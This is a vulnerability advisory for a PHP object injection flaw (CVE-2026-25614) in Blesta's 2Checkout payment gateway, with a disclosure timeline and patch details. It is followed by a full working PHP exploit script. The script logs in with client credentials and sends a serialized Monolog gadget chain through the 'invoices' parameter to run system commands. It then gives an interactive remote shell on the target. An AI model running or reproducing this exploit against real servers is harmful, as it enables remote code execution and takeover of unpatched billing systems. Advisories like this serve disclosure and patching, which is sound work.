Blesta 5.13.1 2Checkout PHP Object Injection

--------------------------------------------------------------------------
Blesta <= 5.13.1 (2Checkout) Multiple Blesta 5.13.1 2Checkout PHP Object Injection

--------------------------------------------------------------------------
Blesta <= 5.13.1 (2Checkout) Multiple PHP Object Injection Vulnerabilities
--------------------------------------------------------------------------


[-] Software Link:

https://www.blesta.com


[-] Affected Versions:

All versions from 3.0.0 to 5.13.1.


[-] Vulnerabilities Description:

The vulnerabilities exist because user input passed through the
"invoices" POST parameter or the "item-ext-ref" GET parameter when
dispatching the Checkout2::validate() or Checkout2::success() method
is not properly sanitized before being used in a call to the
unserialize() PHP function. This can be exploited by malicious client
users to inject arbitrary PHP objects into the application scope,
allowing them to perform a variety of attacks, such as executing
arbitrary PHP code (RCE).

Successful exploitation of this issue requires the 2Checkout payment
gateway to be installed.


[-] Proof of Concept:

https://karmainsecurity.com/pocs/CVE-2026-25614.php


[-] Solution:

Apply the vendor patch or upgrade to version 5.13.2 or later.


[-] Disclosure Timeline:

[19/01/2026] - Vendor notified

[22/01/2026] - CVE identifier requested

[28/01/2026] - Version 5.13.2 released

[31/01/2026] - Version 5.13.3 released to address regressions
introduced in 5.13.2

[03/02/2026] - CVE identifier assigned

[04/02/2026] - Public disclosure


[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.org) has
assigned the name CVE-2026-25614 to these vulnerabilities.


[-] Credits:

Vulnerabilities discovered by Egidio Romano.


[-] Other References:

https://www.blesta.com/2026/01/28/security-advisory/


[-] Original Advisory:

https://karmainsecurity.com/KIS-2026-03


--- packet storm attached poc: ---
<?php

/*
--------------------------------------------------------------------------
Blesta <= 5.13.1 (2Checkout) Multiple PHP Object Injection Vulnerabilities
--------------------------------------------------------------------------

author..............: Egidio Romano aka EgiX
mail................: n0b0d13s[at]gmail[dot]com
software link.......: https://www.blesta.com

+-------------------------------------------------------------------------+
| This proof of concept code was written for educational purpose only. |
| Use it at your own risk. Author will be not responsible for any damage. |
+-------------------------------------------------------------------------+

[-] Original Advisory:

https://karmainsecurity.com/KIS-2026-03
*/

set_time_limit(0);
error_reporting(E_ERROR);

print "\n+-------------------------------------------------------------------+";
print "\n| Blesta <= 5.13.1 (2Checkout) PHP Object Injection Exploit by EgiX |";
print "\n+-------------------------------------------------------------------+\n";

if (!extension_loaded("curl")) die("\n[-] cURL extension required!\n\n");

if ($argc != 4)
{
print "\nUsage......: php $argv[0] <URL> <Username> <Password>\n";
print "\nExample....: php $argv[0] http://localhost/blesta/ egix password";
print "\nExample....: php $argv[0] https://www.blesta.com/ hacker pwned\n\n";
die();
}

class Monolog_Handler_SyslogUdpHandler
{
protected $socket;

function __construct($x)
{
$this->socket = $x;
}
}

class Monolog_Handler_BufferHandler
{
protected $handler;
protected $bufferSize = -1;
protected $buffer;
protected $level = null;
protected $initialized = true;
protected $bufferLimit = -1;
protected $processors;

function __construct($methods, $command)
{
$this->processors = $methods;
$this->buffer = [$command];
$this->handler = $this;
}
}

function exec_cmd($cmd)
{
global $ch, $url, $token;

$cmd .= "; echo CMDDELIM";
$chain = new Monolog_Handler_SyslogUdpHandler(new Monolog_Handler_BufferHandler(['current', 'system'], [$cmd, 'level' => null]));
$chain = base64_encode(str_replace('_', '\\', serialize($chain)));

curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(["invoices" => $chain]));

return curl_exec($ch);
}

$url = $argv[1];
$user = $argv[2];
$pwd = $argv[3];
$ch = curl_init();

@unlink("./cookies.txt");

curl_setopt($ch, CURLOPT_URL, "{$url}client/login/");
curl_setopt($ch, CURLOPT_COOKIEJAR, "./cookies.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "./cookies.txt");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
//curl_setopt($ch, CURLOPT_PROXY, 'http://127.0.0.1:8080');

print "\n[+] Performing client login with username '{$user}' and password '{$pwd}'\n";

if (!preg_match('/"_csrf_token" value="([^"]+)/i', curl_exec($ch), $token)) die("[-] CSRF token not found!\n\n");

curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(["_csrf_token" => $token[1], "username" => $user, "password" => $pwd]));

if (preg_match('/alert-danger/i', curl_exec($ch))) die("[-] Login failed!\n\n");

print "[+] Launching shell\n";

curl_setopt($ch, CURLOPT_URL, "{$url}client_pay/received/checkout2");

while(1)
{
print "\nblesta-shell# ";
if (($cmd = trim(fgets(STDIN))) == "exit") break;
preg_match('/(.*)CMDDELIM/s', exec_cmd($cmd), $m) ? print $m[1] : die("\n[-] Exploit failed!\n\n");
}